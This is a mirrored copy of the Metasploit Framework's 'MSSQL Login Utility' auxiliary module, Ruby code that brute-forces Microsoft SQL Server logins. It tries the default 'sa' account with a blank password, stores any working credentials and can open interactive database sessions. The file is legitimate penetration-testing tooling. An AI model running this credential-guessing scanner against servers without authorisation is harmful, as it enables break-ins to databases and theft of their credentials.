Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/mssql/mssql_login.rb
28052 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasploit/framework/credential_collection'

7
require 'metasploit/framework/login_scanner/mssql'

8
require 'rex/proto/mssql/client'

9
require 'rex/post/mssql'

10


11
class MetasploitModule < Msf::Auxiliary

12
  include Msf::Exploit::Remote::MSSQL

13
  include Msf::Auxiliary::Report

14
  include Msf::Auxiliary::AuthBrute

15
  include Msf::Auxiliary::CommandShell

16
  include Msf::Auxiliary::Scanner

17
  include Msf::Sessions::CreateSessionOptions

18
  include Msf::Auxiliary::ReportSummary

19


20
  def initialize

21
    super(

22
      'Name' => 'MSSQL Login Utility',

23
      'Description' => 'This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).',

24
      'Author' => 'MC',

25
      'References' => [

26
        [ 'CVE', '1999-0506'] # Weak password

27
      ],

28
      'License' => MSF_LICENSE,

29
      # some overrides from authbrute since there is a default username and a blank password

30
      'DefaultOptions' => {

31
        'USERNAME' => 'sa',

32
        'BLANK_PASSWORDS' => true,

33
        'CreateSession' => false

34
      }

35
    )

36
    register_options([

37
      Opt::Proxies,

38
      OptBool.new('TDSENCRYPTION', [ true, 'Use TLS/SSL for TDS data "Force Encryption"', false]),

39
      OptBool.new('CreateSession', [false, 'Create a new session for every successful login', false])

40
    ])

41


42
    if framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)

43
      add_info('New in Metasploit 6.4 - The %grnCreateSession%clr option within this module can open an interactive session')

44
    else

45
      options_to_deregister = %w[CreateSession]

46
    end

47
    deregister_options(*options_to_deregister)

48
  end

49


50
  def create_session?

51
    if framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)

52
      datastore['CreateSession']

53
    else

54
      false

55
    end

56
  end

57


58
  def run

59
    results = super

60
    logins = results.flat_map { |_k, v| v[:successful_logins] }

61
    sessions = results.flat_map { |_k, v| v[:successful_sessions] }

62
    print_status("Bruteforce completed, #{logins.size} #{logins.size == 1 ? 'credential was' : 'credentials were'} successful.")

63
    return results unless framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)

64


65
    if create_session?

66
      print_status("#{sessions.size} MSSQL #{sessions.size == 1 ? 'session was' : 'sessions were'} opened successfully.")

67
    else

68
      print_status('You can open an MSSQL session with these credentials and %grnCreateSession%clr set to true')

69
    end

70
    results

71
  end

72


73
  def run_host(ip)

74
    @print_prefix = '' # remove the redundant prefix because #print_brute will add it

75
    print_brute level: :status, ip: ip, msg: 'MSSQL - Starting authentication scanner.'

76


77
    cred_collection = build_credential_collection(

78
      realm: datastore['DOMAIN'],

79
      username: datastore['USERNAME'],

80
      password: datastore['PASSWORD']

81
    )

82


83
    scanner = Metasploit::Framework::LoginScanner::MSSQL.new(

84
      configure_login_scanner(

85
        host: ip,

86
        port: rport,

87
        proxies: datastore['PROXIES'],

88
        cred_details: cred_collection,

89
        stop_on_success: datastore['STOP_ON_SUCCESS'],

90
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],

91
        connection_timeout: 30,

92
        max_send_size: datastore['TCP::max_send_size'],

93
        send_delay: datastore['TCP::send_delay'],

94
        auth: datastore['Mssql::Auth'],

95
        domain_controller_rhost: datastore['DomainControllerRhost'],

96
        hostname: datastore['Mssql::Rhostname'],

97
        tdsencryption: datastore['TDSENCRYPTION'],

98
        framework: framework,

99
        framework_module: self,

100
        use_client_as_proof: create_session?,

101
        ssl: datastore['SSL'],

102
        ssl_version: datastore['SSLVersion'],

103
        ssl_verify_mode: datastore['SSLVerifyMode'],

104
        ssl_cipher: datastore['SSLCipher'],

105
        local_port: datastore['CPORT'],

106
        local_host: datastore['CHOST']

107
      )

108
    )

109
    successful_logins = []

110
    successful_sessions = []

111
    scanner.scan! do |result|

112
      credential_data = result.to_h

113
      credential_data.merge!(

114
        module_fullname: self.fullname,

115
        workspace_id: myworkspace_id

116
      )

117
      if result.success?

118
        credential_core = create_credential(credential_data)

119
        credential_data[:core] = credential_core

120
        create_credential_login(credential_data)

121
        print_brute level: :good, ip: ip, msg: "Login Successful: #{result.credential}"

122
        successful_logins << result

123


124
        if create_session?

125
          begin

126
            successful_sessions << session_setup(result)

127
          rescue ::StandardError => e

128
            elog('Failed to setup the session', error: e)

129
            print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"

130
            result.connection.close unless result.connection.nil?

131
          end

132
        end

133
      else

134
        invalidate_login(credential_data)

135
        print_brute level: :verror, ip: ip, msg: "LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"

136
      end

137
    end

138
    { successful_logins: successful_logins, successful_sessions: successful_sessions }

139
  end

140


141
  # @param [Metasploit::Framework::LoginScanner::Result] result

142
  # @return [Msf::Sessions::MSSQL]

143
  def session_setup(result)

144
    return unless (result.connection && result.proof)

145


146
    my_session = Msf::Sessions::MSSQL.new(result.connection, { client: result.proof, **result.proof.detect_platform_and_arch })

147
    merge_me = {

148
      'USERPASS_FILE' => nil,

149
      'USER_FILE' => nil,

150
      'PASS_FILE' => nil,

151
      'USERNAME' => result.credential.public,

152
      'PASSWORD' => result.credential.private

153
    }

154


155
    start_session(self, nil, merge_me, false, my_session.rstream, my_session)

156
  end

157
end

158


159